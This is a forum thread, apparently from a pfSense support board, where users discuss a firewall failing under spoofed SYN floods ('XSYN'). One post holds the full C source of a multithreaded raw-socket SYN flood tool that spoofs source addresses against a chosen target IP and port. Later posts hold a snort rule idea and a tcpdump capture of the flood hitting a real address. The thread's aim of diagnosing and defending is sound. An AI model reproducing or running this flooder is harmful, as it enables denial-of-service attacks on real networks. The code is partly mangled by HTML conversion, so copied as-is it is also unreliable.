DDoS pfSense dies on XSYN and OVH scripts.


  • Banned

    It goes offline instantly despite no ressource hog and plenty of CPU to spare.

    Tested on 100mbit, 1Gbit and 10gbit pipes.

    It lasts the longest on the 100Mbit pipe.

    It survives and keeps beeing responsive on SSDP, ESSYN, UQUAKE and most Layer7 attacks.

    Any guesses to why??



  • If there is anyone here who can help, i would like to pay a good amount of money $$$$ - Just tell me how to prevent these attacks without limiting pfsense in such a way that there is no idea using it.
    Tired of getting ddosed by scripkiddies who is misusing the design of pfsense to. It is not a traditional where the bandwidth is 500mbit attack etc.

    We are talking about 10mbit special spoofed attack on 1Gb and 10Gbit drops… Goes instantly offline. It is all SYN but just special way. I may have the source and a packet capture file for the one who really knows this field.

    • If not using any firewall, there is no issues, You can even prevent it by using iptables or windows firewall... Running stateless is a bit better, but this opens other issues as well.

    Regular SSYN flood is no problem for pfsense thanks to the SYN cookie feature. But they somehow found another way around so they are bypassing the ordinary check with these new type of SYN flood... They name it XSYN, ESSYN, OVH method etc....



  • Can you share some of those packets?

    F.


  • Banned

    With XSYN it only takes 5mbit of traffic to make pfSense very unstable.

    Any booter or stresser can take whatever site with pfsense offline instantly.

    We hope to have some sort of reply from the Dev. team regarding this and it would be great to have a test site going so we can stress it and they can see how little it takes to bring it down.


  • Banned

    When the video is treated by Youtube, you can watch what happens when pfSense get DDoS'ed.

    http://youtu.be/mUxUYPHGrlM

    Watch it in 720p.

    The attack takes 120 seconds and takes it offline instantly. Doesnt route anything meanwhile.



  • Just making sure, this attack is a "Spoofed SYN" attack, right? I get very few hits for XSYN or ESSYN, and the few hits I found said they're also known as SSYN. But then it was posted that PFSense handles ESSYN just fine, but not XSYN. Now I'm confused. Is a there a place that defines exactly what these attacks are because Google is returning nothing useful.


  • Banned

    Its new scripts emerging with new ways to take down sites.

    Thats the only explanation I have. I could run a packet capture but in seconds it is 500MB file….


  • Banned

    THis is the XSYN script

    #include <pthread.h>#include <unistd.h>#include <stdio.h>#include <stdlib.h>#include <string.h>#include <sys socket.h="">#include <netinet ip.h="">#include <netinet tcp.h="">#include <time.h>#define MAX_PACKET_SIZE 4096
    #define PHI 0x9e3779b9

    static unsigned long int Q[4096], c = 362436;
    static unsigned int floodport;
    volatile int limiter;
    volatile unsigned int pps;
    volatile unsigned int sleeptime = 100;

    void init_rand(unsigned long int x)
    {
            int i;
            Q[0] = x;
            Q[1] = x + PHI;
            Q[2] = x + PHI + PHI;
            for (i = 3; i < 4096; i++){ Q _= Q _^ Q _^ PHI ^ i; }
    }
    unsigned long int rand_cmwc(void)
    {
            unsigned long long int t, a = 18782LL;
            static unsigned long int i = 4095;
            unsigned long int x, r = 0xfffffffe;
            i = (i + 1) & 4095;
            t = a * Q _+ c;
            c = (t >> 32);
            x = t + c;
            if (x < c) {
                    x++;
                    c++;
            }
            return (Q _= r - x);
    }
    unsigned short csum (unsigned short *buf, int count)
    {
            register unsigned long sum = 0;
            while( count > 1 ) { sum += *buf++; count -= 2; }
            if(count > 0) { sum += *(unsigned char *)buf; }
            while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); }
            return (unsigned short)(~sum);
    }

    unsigned short tcpcsum(struct iphdr *iph, struct tcphdr *tcph) {

    struct tcp_pseudo
            {
                    unsigned long src_addr;
                    unsigned long dst_addr;
                    unsigned char zero;
                    unsigned char proto;
                    unsigned short length;
            } pseudohead;
            unsigned short total_len = iph->tot_len;
            pseudohead.src_addr=iph->saddr;
            pseudohead.dst_addr=iph->daddr;
            pseudohead.zero=0;
            pseudohead.proto=IPPROTO_TCP;
            pseudohead.length=htons(sizeof(struct tcphdr));
            int totaltcp_len = sizeof(struct tcp_pseudo) + sizeof(struct tcphdr);
            unsigned short *tcp = malloc(totaltcp_len);
            memcpy((unsigned char *)tcp,&pseudohead,sizeof(struct tcp_pseudo));
            memcpy((unsigned char *)tcp+sizeof(struct tcp_pseudo),(unsigned char *)tcph,sizeof(struct tcphdr));
            unsigned short output = csum(tcp,totaltcp_len);
            free(tcp);
            return output;
    }

    void setup_ip_header(struct iphdr *iph)
    {
            char ip[17];
            snprintf(ip, sizeof(ip)-1, "%d.%d.%d.%d", rand()%255, rand()%255, rand()%255, rand()%255);
            iph->ihl = 5;
            iph->version = 4;
            iph->tos = 0;
            iph->tot_len = sizeof(struct iphdr) + sizeof(struct tcphdr);
            iph->id = htonl(rand()%54321);
            iph->frag_off = 0;
            iph->ttl = MAXTTL;
            iph->protocol = 6;
            iph->check = 0;
            iph->saddr = inet_addr(ip);
    }

    void setup_tcp_header(struct tcphdr *tcph)
    {
            tcph->source = htons(rand()%65535);
            tcph->seq = rand();
            tcph->ack_seq = 0;
            tcph->res2 = 0;
            tcph->doff = 5;
            tcph->syn = 1;
            tcph->window = htonl(65535);
            tcph->check = 0;
            tcph->urg_ptr = 0;
    }

    void *flood(void *par1)
    {
            char *td = (char *)par1;
            char datagram[MAX_PACKET_SIZE];
            struct iphdr *iph = (struct iphdr *)datagram;
            struct tcphdr *tcph = (void *)iph + sizeof(struct iphdr);
         
            struct sockaddr_in sin;
            sin.sin_family = AF_INET;
            sin.sin_port = htons(floodport);
            sin.sin_addr.s_addr = inet_addr(td);

    int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
            if(s < 0){
                    fprintf(stderr, "Could not open raw socket.\n");
                    exit(-1);
            }
            memset(datagram, 0, MAX_PACKET_SIZE);
            setup_ip_header(iph);
            setup_tcp_header(tcph);

    tcph->dest = htons(floodport);

    iph->daddr = sin.sin_addr.s_addr;
            iph->check = csum ((unsigned short *) datagram, iph->tot_len);

    int tmp = 1;
            const int *val = &tmp;
            if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
                    fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
                    exit(-1);
            }

    init_rand(time(NULL));
            register unsigned int i;
            i = 0;
            while(1){
                    sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof(sin));
                    setup_ip_header(iph);
                    setup_tcp_header(tcph);
                    iph->saddr = (rand_cmwc() >> 24 & 0xFF) << 24 | (rand_cmwc() >> 16 & 0xFF) << 16 | (rand_cmwc() >> 8 & 0xFF) << 8 | (rand_cmwc() & 0xFF);
                    iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);

    tcph->dest = htons(floodport);

    iph->daddr = sin.sin_addr.s_addr;

    iph->check = csum ((unsigned short *) datagram, iph->tot_len);
                    tcph->seq = rand_cmwc() & 0xFFFF;
                    tcph->source = htons(rand_cmwc() & 0xFFFF);
                    tcph->check = 0;
                    tcph->check = tcpcsum(iph, tcph);
                 
                    pps++;
                    if(i >= limiter)
                    {
                            i = 0;
                            usleep(sleeptime);
                    }
                    i++;
            }
    }
    int main(int argc, char *argv[ ])
    {
            if(argc < 6){
                    fprintf(stderr, "Invalid parameters!\n");
                    fprintf(stdout, "SSYN Flooder by LSDEV\nImproved by Starfall\nUsage: %s <target ip=""><port to="" be="" flooded=""><number threads="" to="" use=""><pps limiter,="" -1="" for="" no="" limit=""><time>\n", argv[0]);
                    exit(-1);
            }
            srand(time(0));
            fprintf(stdout, "Tank: So what do you need? Besides a miracle.\nNeo: Packets. Lots of packets.\n");

    int num_threads = atoi(argv[3]);
            floodport = atoi(argv[2]);
            int maxpps = atoi(argv[4]);
            limiter = 0;
            pps = 0;
            pthread_t thread[num_threads];
         
            int multiplier = 20;

    int i;
            for(i = 0;i<num_threads;i++){<br>                pthread_create( &thread_, NULL, &flood, (void *)argv[1]);
            }
            for(i = 0;i<(atoi(argv[5])*multiplier);i++)
            {
                    usleep((1000/multiplier)1000);
                    if((pps
    multiplier) > maxpps)
                    {
                            if(1 > limiter)
                            {
                                    sleeptime+=100;
                            } else {
                                    limiter–;
                            }
                    } else {
                            limiter++;
                            if(sleeptime > 25)
                            {
                                    sleeptime-=25;
                            } else {
                                    sleeptime = 0;
                            }
                    }
                    pps = 0;
            }

    return 0;
    }</num_threads;i++){<br></time></pps></number></port></target>____</time.h></netinet></netinet></sys></string.h></stdlib.h></stdio.h></unistd.h></pthread.h>



  • @Supermule:

    Its new scripts emerging with new ways to take down sites.

    Thats the only explanation I have. I could run a packet capture but in seconds it is 500MB file….

    Just set the capture to 100 packets. Based on the number coming in, that should be all is needed for a sample.



  • edit: scratch this, "tot_len" looks to be passed around. datagram may be MAX_PACKET_SIZE, but tot_len is used.

    Just glancing through the code, it looks as if it's sending SYN packets with data in them.

     memset(datagram, 0, MAX_PACKET_SIZE);
            setup_ip_header(iph);
            setup_tcp_header(tcph);
    
            tcph->dest = htons(floodport);
    
            iph->daddr = sin.sin_addr.s_addr;
            iph->check = csum ((unsigned short *) datagram, iph->tot_len);
    

    ~~What's also interesting is that MAX_PACKET_SIZE is defined as 4096, which would mean it would need to get fragmented.

    So assuming that I'm reading the code correctly, we're talking about 4KB SYN packets that are fragmented. I don't know if cookies are useful against SYN packets with data, yet alone fragmented.~~

    Again, we'll have to see some example dumps.



  • Wouldnt that rule cover it ?

    alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"DELETED BAD-TRAFFIC data in TCP SYN packet"; flow:stateless; dsize:>6; flags:S,12; reference:url,www.cert.org/incident_notes/IN-99-07.html; classtype:misc-activity; sid:526; rev:14;)

    Still…w/o a pcap its all mombo jumbo...

    http://manual.snort.org/node33.html

    When we see it, its possible to play with flow, seq, ttl, size...etc...

    F.


  • Banned

    100 packets capture, full log view.

    10:30:39.512882 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 15609, offset 0, flags [none], proto TCP (6), length 40)
        124.126.1.96.12168 > 80.197.144.99.80: Flags , cksum 0x1957 (correct), seq 128778240, win 0, length 0
    10:30:39.512889 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 244, id 55269, offset 0, flags [none], proto TCP (6), length 40)
        146.165.177.209.56401 > 80.197.144.99.80: Flags , cksum 0xcd22 (correct), seq 3766353920, win 0, length 0
    10:30:39.512894 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 5448, offset 0, flags [none], proto TCP (6), length 40)
        142.229.57.191.34479 > 80.197.144.99.80: Flags , cksum 0xc66e (correct), seq 3097952256, win 0, length 0
    10:30:39.512900 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 8226, offset 0, flags [none], proto TCP (6), length 40)
        98.180.161.223.44311 > 80.197.144.99.80: Flags , cksum 0x7344 (correct), seq 2843344896, win 0, length 0
    10:30:39.512905 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 25435, offset 0, flags [none], proto TCP (6), length 40)
        181.82.109.47.28448 > 80.197.144.99.80: Flags , cksum 0x81eb (correct), seq 3134980096, win 0, length 0
    10:30:39.512916 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 244, id 62920, offset 0, flags [none], proto TCP (6), length 40)
        121.220.208.214.22518 > 80.197.144.99.80: Flags , cksum 0xd178 (correct), seq 1514668032, win 0, length 0
    10:30:39.512923 00:0c:29:d4:ef:2c > 4c:00:82:ee:cf:d9, ethertype IPv4 (0x0800), length 58: (tos 0x0, ttl 127, id 255, offset 0, flags [DF], proto TCP (6), length 44)
        80.197.144.99.80 > 66.247.29.183.56944: Flags [S.], cksum 0x6ac1 (correct), seq 974824198, ack 261881857, win 8192, options [mss 1460], length 0
    10:30:39.512929 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 59540, offset 0, flags [none], proto TCP (6), length 40)
        119.25.145.201.64822 > 80.197.144.99.80: Flags , cksum 0x766d (correct), seq 1373831168, win 0, length 0
    10:30:39.512979 00:0c:29:d4:ef:2c > 4c:00:82:ee:cf:d9, ethertype IPv4 (0x0800), length 58: (tos 0x0, ttl 127, id 256, offset 0, flags [DF], proto TCP (6), length 44)
        80.197.144.99.80 > 63.118.133.110.20856: Flags [S.], cksum 0x7898 (correct), seq 850731965, ack 2973040641, win 8192, options [mss 1460], length 0
    10:30:39.513032 00:0c:29:d4:ef:2c > 4c:00:82:ee:cf:d9, ethertype IPv4 (0x0800), length 58: (tos 0x0, ttl 127, id 257, offset 0, flags [DF], proto TCP (6), length 44)
        80.197.144.99.80 > 194.251.26.247.64387: Flags [S.], cksum 0xa9d7 (correct), seq 780280974, ack 3225288705, win 8192, options [mss 1460], length 0
    10:30:39.513069 00:0c:29:d4:ef:2c > 4c:00:82:ee:cf:d9, ethertype IPv4 (0x0800), length 58: (tos 0x0, ttl 127, id 258, offset 0, flags [DF], proto TCP (6), length 44)
        80.197.144.99.80 > 24.254.59.7.40452: Flags [S.], cksum 0x341d (correct), seq 2301007402, ack 1361379329, win 8192, options [mss 1460], length 0
    10:30:39.513105 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 58084, offset 0, flags [none], proto TCP (6), length 40)
        132.56.232.167.26069 > 80.197.144.99.80: Flags , cksum 0x8170 (correct), seq 2051276800, win 0, length 0
    10:30:39.513111 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 25107, offset 0, flags [none], proto TCP (6), length 40)
        217.240.47.106.37841 > 80.197.144.99.80: Flags , cksum 0xe3a3 (correct), seq 1301938176, win 0, length 0
    10:30:39.513116 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 32613, offset 0, flags [none], proto TCP (6), length 40)
        203.27.178.8.42841 > 80.197.144.99.80: Flags , cksum 0x25e2 (correct), seq 2215247872, win 0, length 0
    10:30:39.513129 00:0c:29:d4:ef:2c > 4c:00:82:ee:cf:d9, ethertype IPv4 (0x0800), length 58: (tos 0x0, ttl 127, id 259, offset 0, flags [DF], proto TCP (6), length 44)
        80.197.144.99.80 > 90.32.123.216.56239: Flags [S.], cksum 0xf380 (correct), seq 3316227498, ack 2384396289, win 8192, options [mss 1460], length 0
    10:30:39.513138 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 40324, offset 0, flags [none], proto TCP (6), length 40)
        138.148.30.251.1975 > 80.197.144.99.80: Flags , cksum 0x8f77 (correct), seq 2376859648, win 0, length 0
    10:30:39.513143 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 38512, offset 0, flags [none], proto TCP (6), length 40)
        126.105.143.214.53029 > 80.197.144.99.80: Flags , cksum 0x7de9 (correct), seq 1931149312, win 0, length 0
    10:30:39.513148 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 244, id 21053, offset 0, flags [none], proto TCP (6), length 40)
        125.41.180.149.55609 > 80.197.144.99.80: Flags , cksum 0x6edc (correct), seq 1419051008, win 0, length 0
    10:30:39.513153 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 12435, offset 0, flags [none], proto TCP (6), length 40)
        134.129.53.201.56635 > 80.197.144.99.80: Flags , cksum 0x2d4e (correct), seq 127270912, win 0, length 0
    10:30:39.513157 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 13121, offset 0, flags [none], proto TCP (6), length 40)
        135.55.17.72.64101 > 80.197.144.99.80: Flags , cksum 0x481a (correct), seq 4083810304, win 0, length 0
    10:30:39.513171 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 42913, offset 0, flags [none], proto TCP (6), length 40)
        146.221.69.178.15824 > 80.197.144.99.80: Flags , cksum 0x8c3e (correct), seq 734789632, win 0, length 0
    10:30:39.513176 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 37333, offset 0, flags [none], proto TCP (6), length 40)
        140.154.19.76.28946 > 80.197.144.99.80: Flags , cksum 0xd946 (correct), seq 3827957760, win 0, length 0
    10:30:39.513181 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 244, id 24788, offset 0, flags [none], proto TCP (6), length 40)
        183.130.66.135.25433 > 80.197.144.99.80: Flags , cksum 0xfc53 (correct), seq 1957888000, win 0, length 0
    10:30:39.513185 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 41109, offset 0, flags [none], proto TCP (6), length 40)
        96.250.94.246.26385 > 80.197.144.99.80: Flags , cksum 0x4012 (correct), seq 1733689344, win 0, length 0
    10:30:39.513193 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 244, id 36016, offset 0, flags [none], proto TCP (6), length 40)
        42.233.83.95.32369 > 80.197.144.99.80: Flags , cksum 0x7181 (correct), seq 1613692928, win 0, length 0
    10:30:39.513198 00:0c:29:d4:ef:2c > 4c:00:82:ee:cf:d9, ethertype IPv4 (0x0800), length 58: (tos 0x0, ttl 127, id 260, offset 0, flags [DF], proto TCP (6), length 44)
        80.197.144.99.80 > 174.62.195.127.17079: Flags [S.], cksum 0x5c79 (correct), seq 3567492465, ack 328794113, win 8192, options [mss 1460], length 0
    10:30:39.513204 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 244, id 23555, offset 0, flags [none], proto TCP (6), length 40)
        133.237.77.73.15765 > 80.197.144.99.80: Flags , cksum 0x3c91 (correct), seq 2165112832, win 0, length 0
    10:30:39.513210 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 20533, offset 0, flags [none], proto TCP (6), length 40)
        194.82.219.188.26186 > 80.197.144.99.80: Flags , cksum 0x1c61 (correct), seq 2913927168, win 0, length 0
    10:30:39.513215 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 244, id 29941, offset 0, flags [none], proto TCP (6), length 40)
        2.175.116.175.56648 > 80.197.144.99.80: Flags , cksum 0xabbc (correct), seq 3456499712, win 0, length 0
    10:30:39.513219 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 11326, offset 0, flags [none], proto TCP (6), length 40)
        77.224.169.12.27795 > 80.197.144.99.80: Flags , cksum 0x47d4 (correct), seq 588644352, win 0, length 0
    10:30:39.513229 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 21511, offset 0, flags [none], proto TCP (6), length 40)
        59.27.175.229.27925 > 80.197.144.99.80: Flags , cksum 0x7142 (correct), seq 85065728, win 0, length 0
    10:30:39.513234 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 244, id 35835, offset 0, flags [none], proto TCP (6), length 40)
        177.25.59.242.24222 > 80.197.144.99.80: Flags , cksum 0x5223 (correct), seq 815595520, win 0, length 0
    10:30:39.513238 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 31334, offset 0, flags [none], proto TCP (6), length 40)
        169.234.140.63.18063 > 80.197.144.99.80: Flags , cksum 0x10e5 (correct), seq 1087111168, win 0, length 0
    10:30:39.513243 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 44152, offset 0, flags [none], proto TCP (6), length 40)
        8.84.151.119.14632 > 80.197.144.99.80: Flags , cksum 0x93e6 (correct), seq 1636827136, win 0, length 0
    10:30:39.513248 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 7412, offset 0, flags [none], proto TCP (6), length 40)
        221.82.85.146.9125 > 80.197.144.99.80: Flags , cksum 0xbb9d (correct), seq 3158441984, win 0, length 0
    10:30:39.513255 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 244, id 21173, offset 0, flags [none], proto TCP (6), length 40)
        46.183.138.45.4730 > 80.197.144.99.80: Flags , cksum 0x9113 (correct), seq 1912078336, win 0, length 0
    10:30:39.513259 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 25625, offset 0, flags [none], proto TCP (6), length 40)
        181.120.7.61.44990 > 80.197.144.99.80: Flags , cksum 0xb9d9 (correct), seq 2820407296, win 0, length 0
    10:30:39.513264 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 37713, offset 0, flags [none], proto TCP (6), length 40)
        125.185.112.15.5395 > 80.197.144.99.80: Flags , cksum 0xab36 (correct), seq 542638080, win 0, length 0
    10:30:39.513269 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 244, id 34266, offset 0, flags [none], proto TCP (6), length 40)
        44.27.106.98.25930 > 80.197.144.99.80: Flags , cksum 0xb80e (correct), seq 445906944, win 0, length 0
    10:30:39.513274 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 244, id 3720, offset 0, flags [none], proto TCP (6), length 40)
        55.5.128.17.25981 > 80.197.144.99.80: Flags , cksum 0xad36 (correct), seq 77594624, win 0, length 0
    10:30:39.513281 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 57514, offset 0, flags [none], proto TCP (6), length 40)
        135.124.240.221.8915 > 80.197.144.99.80: Flags , cksum 0xb024 (correct), seq 2199388160, win 0, length 0
    10:30:39.513285 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 3550, offset 0, flags [none], proto TCP (6), length 40)
        91.191.90.204.49263 > 80.197.144.99.80: Flags , cksum 0x8286 (correct), seq 3571974144, win 0, length 0
    10:30:39.513290 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 30244, offset 0, flags [none], proto TCP (6), length 40)
        37.132.112.137.61653 > 80.197.144.99.80: Flags , cksum 0x12fe (correct), seq 881393664, win 0, length 0
    10:30:39.513295 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 27034, offset 0, flags [none], proto TCP (6), length 40)
        190.99.190.67.52735 > 80.197.144.99.80: Flags , cksum 0xd9a5 (correct), seq 2854027264, win 0, length 0
    10:30:39.513299 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 64661, offset 0, flags [none], proto TCP (6), length 40)
        118.109.155.34.23598 > 80.197.144.99.80: Flags , cksum 0x4deb (correct), seq 314638336, win 0, length 0
    10:30:39.513306 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 56817, offset 0, flags [none], proto TCP (6), length 40)
        88.170.38.208.52781 > 80.197.144.99.80: Flags , cksum 0xf671 (correct), seq 2320498688, win 0, length 0
    10:30:39.513311 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 244, id 34707, offset 0, flags [none], proto TCP (6), length 40)
        110.166.177.145.23689 > 80.197.144.99.80: Flags , cksum 0x71d9 (correct), seq 3754885120, win 0, length 0
    10:30:39.513315 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 55794, offset 0, flags [none], proto TCP (6), length 40)
        94.43.246.118.9586 > 80.197.144.99.80: Flags , cksum 0xb3bd (correct), seq 2694316032, win 0, length 0
    10:30:39.513320 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 52303, offset 0, flags [none], proto TCP (6), length 40)
        213.89.0.90.40753 > 80.197.144.99.80: Flags , cksum 0x68b3 (correct), seq 4040228864, win 0, length 0
    10:30:39.513326 00:0c:29:d4:ef:2c > 4c:00:82:ee:cf:d9, ethertype IPv4 (0x0800), length 58: (tos 0x0, ttl 127, id 261, offset 0, flags [DF], proto TCP (6), length 44)
        80.197.144.99.80 > 216.157.141.54.9831: Flags [S.], cksum 0x9a91 (correct), seq 2949879653, ack 680984577, win 8192, options [mss 1460], length 0
    10:30:39.513332 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 28785, offset 0, flags [none], proto TCP (6), length 40)
        91.25.215.249.27514 > 80.197.144.99.80: Flags , cksum 0x59f5 (correct), seq 3588685824, win 0, length 0
    10:30:39.513344 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 52053, offset 0, flags [none], proto TCP (6), length 40)
        177.13.166.204.32876 > 80.197.144.99.80: Flags , cksum 0xf5b1 (correct), seq 7471104, win 0, length 0
    10:30:39.513349 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 1589, offset 0, flags [none], proto TCP (6), length 40)
        219.189.244.20.17361 > 80.197.144.99.80: Flags , cksum 0xb745 (correct), seq 58785792, win 0, length 0
    10:30:39.513354 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 26750, offset 0, flags [none], proto TCP (6), length 40)
        63.48.11.253.57233 > 80.197.144.99.80: Flags , cksum 0x0017 (correct), seq 2744385536, win 0, length 0
    10:30:39.513358 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 244, id 23381, offset 0, flags [none], proto TCP (6), length 40)
        200.108.55.167.11648 > 80.197.144.99.80: Flags , cksum 0x85d7 (correct), seq 452919296, win 0, length 0
    10:30:39.513363 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 244, id 53581, offset 0, flags [none], proto TCP (6), length 40)
        37.55.185.36.60295 > 80.197.144.99.80: Flags , cksum 0xebcb (correct), seq 414908416, win 0, length 0
    10:30:39.513371 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 39173, offset 0, flags [none], proto TCP (6), length 40)
        67.87.60.183.39445 > 80.197.144.99.80: Flags , cksum 0x4793 (correct), seq 1823670272, win 0, length 0
    10:30:39.513376 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 23125, offset 0, flags [none], proto TCP (6), length 40)
        36.103.23.138.50138 > 80.197.144.99.80: Flags , cksum 0xed1f (correct), seq 3783131136, win 0, length 0
    10:30:39.513381 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 59205, offset 0, flags [none], proto TCP (6), length 40)
        121.160.127.210.11664 > 80.197.144.99.80: Flags , cksum 0xe00b (correct), seq 3344629760, win 0, length 0
    10:30:39.513386 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 6157, offset 0, flags [none], proto TCP (6), length 40)
        76.192.43.182.47350 > 80.197.144.99.80: Flags , cksum 0xf953 (correct), seq 2745761792, win 0, length 0
    10:30:39.513391 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 42872, offset 0, flags [none], proto TCP (6), length 40)
        115.58.37.86.40228 > 80.197.144.99.80: Flags , cksum 0x76e6 (correct), seq 567214080, win 0, length 0
    10:30:39.513398 4c:00:82:ee:cf:d9 > 00:0c:29:d4:ef:2c, ethertype IPv4 (0x0800), length 60: (tos 0x0, ttl 243, id 29957, offset 0, flags [none], proto TCP (6), length 40)
        176.6.73.99.25224 > 80.197.144.99.80: Flags , cksum 0x13a0 (correct), seq 1591214080, win 0, length 0
